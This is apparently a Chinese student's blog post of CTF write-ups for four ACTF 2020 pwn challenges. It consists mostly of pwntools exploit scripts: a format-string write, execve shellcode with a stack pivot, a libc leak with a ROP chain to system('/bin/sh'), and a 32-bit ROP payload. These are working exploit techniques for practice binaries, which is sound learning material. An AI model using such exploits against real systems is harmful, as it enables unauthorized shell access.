ACTF 2020 pwn


阅读数: 次   
字数统计: 627字   |   阅读时长: 3分

fmt32
shellcode
chk_rop
simple_rop

@TOC
太菜了,只会写模板题

fmt32

格式化字符串模板题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#!/usr/bin/env python2
from pwn import *

arch = "i386"
filename = "fmt32"

context(os="linux", arch=arch, log_level="debug")
content = 0

offset = 0
# elf
elf = ELF(filename)
a1_addr=0x0804A070
a2_addr=0x0804A06C

# libc

def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def main():
    global io
    if content == 0:
        io = process("./" + filename)
    else:
        io = remote("")
    payload=p32(a1_addr)+p32(a2_addr)+b'%12$n'
    payload+=b'%8x%11$n'
    print(len(payload))
    io.sendline(payload)
    io.interactive()
main()

shellcode

栈迁移(jmp rsp上面刚好有一条指令把栈的位置减到shellcode的地方)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#!/usr/bin/env python2
from pwn import *

arch = "amd64"
filename = "shellcode"

context(os="linux", arch=arch, log_level="debug")
content = 0

offset = 0
# elf
elf = ELF(filename)

# libc

def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def main():
    global io
    if content == 0:
        io = process("./" + filename)
    else:
        io = remote("")
    payload=b'\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05'
    payload=payload.ljust(0x28,b'a')
    payload+=p64(0x000000000040070B)
    print(len(payload))
    io.send(payload)
    io.interactive()
main()

chk_rop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
#!/usr/bin/env python2
# coding=utf-8
from pwn import *

arch = "amd64"
filename = "chk_rop"

context(os="linux", arch=arch, log_level="debug")
content = 0

offset = 0
# elf
elf = ELF(filename)
pop_rdi=0x00000000004009d3
# libc
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ogg_libc=[0x45226,0x4527a,0xf0364,0xf1207]
def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def main():
    global io
    if content == 0:
        io = process("./" + filename)
    else:
        io = remote("")
    #####leak_libc#####
    io.recvuntil("Give you a gift...")
    #gdb.attach(io,b'b __printf_chk')
    io.sendline(b'%p%p')
    io.recvuntil(b'0x')
    io.recvuntil(b'0x')
    __read_nocancel=int(io.recv(12),16)-0x10
    print("__read_nocancel:", hex(__read_nocancel))
    #__libc_start_main=int(io.recv(14),16)-240
    #print("__libc_start_main:",hex(__libc_start_main))
    #####count#####
    #libcbase=__libc_start_main-libc.symbols['__libc_start_main']
    libcbase=__read_nocancel-libc.symbols['read']
    print("libcbase:",hex(libcbase))
    ogg_addr=libcbase+ogg_libc[3]
    sys_addr=libcbase+libc.symbols['system']
    binsh_addr=libcbase+next(libc.search(b'/bin/sh'))
    #####getshell#####
    io.recvuntil("Tell me U filename\n")
    io.sendline(b'a'*(0xf))
    io.recvuntil("And the content:\n")
    payload =b'a'*(0x50+8)+p64(pop_rdi)+p64(binsh_addr)+p64(sys_addr) #p64(ogg_addr)
    io.sendline(payload)
    io.interactive()
main()

simple_rop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#!/usr/bin/env python2
# coding=utf-8
from pwn import *

arch = "i386"
filename = "simple_rop"

context(os="linux", arch=arch, log_level="debug")
content = 0

offset = 0
# elf
elf = ELF(filename)
binsh_addr=0x0804A050
call_sys_addr=0x080487EF

# libc

def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def main():
    global io
    if content == 0:
        io = process("./" + filename)
    else:
        io = remote("")
    #%50概率绕过v6造成的返回地址不确定,两种都试一下就%100了,哈哈
    #payload=p32(call_sys_addr)+p32(binsh_addr)
    payload=p32(binsh_addr)+p32(call_sys_addr)
    payload=payload*6
    io.send(payload)
    io.recvuntil("Give you a cursor: \n")
    io.sendline("-2147483648")
    io.interactive()
main()


-------------本文结束感谢您的阅读-------------



谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
本站总访问量 本站访客数人次

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

朱登榜,来自河南郑州,河南大学学生,倘若文章有错误,望提醒修正,感谢!<br>qq:879322660<br>微信:z15981855791